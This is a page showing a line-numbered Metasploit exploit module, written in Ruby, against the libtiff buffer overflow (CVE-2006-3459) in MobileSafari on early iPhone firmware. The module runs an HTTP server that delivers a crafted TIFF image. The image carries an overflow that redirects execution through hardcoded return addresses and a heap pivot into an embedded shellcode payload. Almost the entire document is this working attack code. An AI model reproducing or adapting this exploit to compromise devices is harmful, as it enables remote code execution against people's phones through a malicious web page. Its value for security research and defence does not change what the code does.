Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  #
10
  # This module acts as an HTTP server
11
  #
12
  include Msf::Exploit::Remote::HttpServer::HTML
13

14
  def initialize(info = {})
15
    super(update_info(info,
16
      'Name'           => 'Apple iOS MobileSafari LibTIFF Buffer Overflow',
17
      'Description'    => %q{
18
          This module exploits a buffer overflow in the version of
19
        libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
20
        1.1.1 of the Apple iPhone. iPhones which have not had the BSD
21
        tools installed will need to use a special payload.
22
      },
23
      'License'        => MSF_LICENSE,
24
      'Author'         =>  ['hdm', 'kf'],
25
      'References'     =>
26
        [
27
          ['CVE', '2006-3459'],
28
          ['OSVDB', '27723'],
29
          ['BID', '19283']
30
        ],
31
      'Payload'        =>
32
        {
33
          'Space'    => 1800,
34
          'BadChars' => "",
35

36
          # Multi-threaded applications are not allowed to execve() on OS X
37
          # This stub injects a vfork/exit in front of the payload
38
          'Prepend'  =>
39
            [
40
              0xe3a0c042, # vfork
41
              0xef000080, # sc
42
              0xe3500000, # cmp r0, #0
43
              0x1a000001, # bne
44
              0xe3a0c001, # exit(0)
45
              0xef000080  # sc
46
            ].pack("V*")
47
        },
48
      'Arch'           => ARCH_ARMLE,
49
      'Platform'       => %w{ osx },
50
      'Targets'        =>
51
        [
52

53
          [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
54
            {
55
              'Platform' => 'osx',
56

57
              # Scratch space for our shellcode and stack
58
              'Heap'     => 0x00802000,
59

60
              # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
61
              'Magic'    => 0x300d562c,
62
            }
63
          ],
64
        ],
65
      'DefaultTarget'  => 0,
66
      'DisclosureDate' => '2006-08-01'
67
      ))
68
  end
69

70
  def on_request_uri(cli, req)
71

72

73
    # Re-generate the payload
74
    return if ((p = regenerate_payload(cli)) == nil)
75

76
    # Grab reference to the target
77
    t = target
78

79
    print_status("Sending exploit")
80

81
    # Transmit the compressed response to the client
82
    send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })
83

84
    # Handle the payload
85
    handler(cli)
86
  end
87

88
  def generate_tiff(code, targ)
89

90
    #
91
    # This is a TIFF file, we have a huge range of evasion
92
    # capabilities, but for now, we don't use them.
93
    #  - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
94
    #
95

96
    lolz = 2048
97
    tiff =
98
      "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
99
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
100
      "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
101
      "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+
102
      "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+
103
      "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+
104
      "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+
105
      "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
106
      "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
107
      "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
108
      [lolz].pack("V") +
109
      "\x84\x00\x00\x00\x00\x00\x00\x00"
110

111
    # Randomize the bajeezus out of our data
112
    hehe = rand_text(lolz)
113

114
    # Were going to candy mountain!
115
    hehe[120, 4] = [targ['Magic']].pack("V")
116

117
    # >> add r0, r4, #0x30
118
    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
119

120
    # Candy mountain, Charlie!
121
    # >> mov r1, sp
122

123
    # It will be an adventure!
124
    # >> mov r2, r8
125
    hehe[ 92, 4] = [ hehe.length ].pack("V")
126

127
    # Its a magic leoplurodon!
128
    # It has spoken!
129
    # It has shown us the way!
130
    # >> bl _memcpy
131

132
    # Its just over this bridge, Charlie!
133
    # This magical bridge!
134
    # >> ldr r3, [r4, #32]
135
    # >> ldrt r3, [pc], r3, lsr #30
136
    # >> str r3, [r4, #32]
137
    # >> ldr r3, [r4, #36]
138
    # >> ldrt r3, [pc], r3, lsr #30
139
    # >> str r3, [r4, #36]
140
    # >> ldr r3, [r4, #40]
141
    # >> ldrt r3, [pc], r3, lsr #30
142
    # >> str r3, [r4, #40]
143
    # >> ldr r3, [r4, #44]
144
    # >> ldrt r3, [pc], r3, lsr #30
145
    # >> str r3, [r4, #44]
146

147
    # We made it to candy mountain!
148
    # Go inside Charlie!
149
    # sub sp, r7, #0x14
150
    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
151

152
    # Goodbye Charlie!
153
    # ;; targ['Heap'] + 0x48 becomes the stack pointer
154
    # >> ldmia sp!, {r8, r10}
155

156
    # Hey, what the...!
157
    # >> ldmia sp!, {r4, r5, r6, r7, pc}
158

159
    # Return back to the copied heap data
160
    hehe[192, 4] = [  targ['Heap'] + 196  ].pack("V")
161

162
    # Insert our actual shellcode at heap location + 196
163
    hehe[196, payload.encoded.length] = payload.encoded
164

165
    tiff << hehe
166
  end
167
end
168

169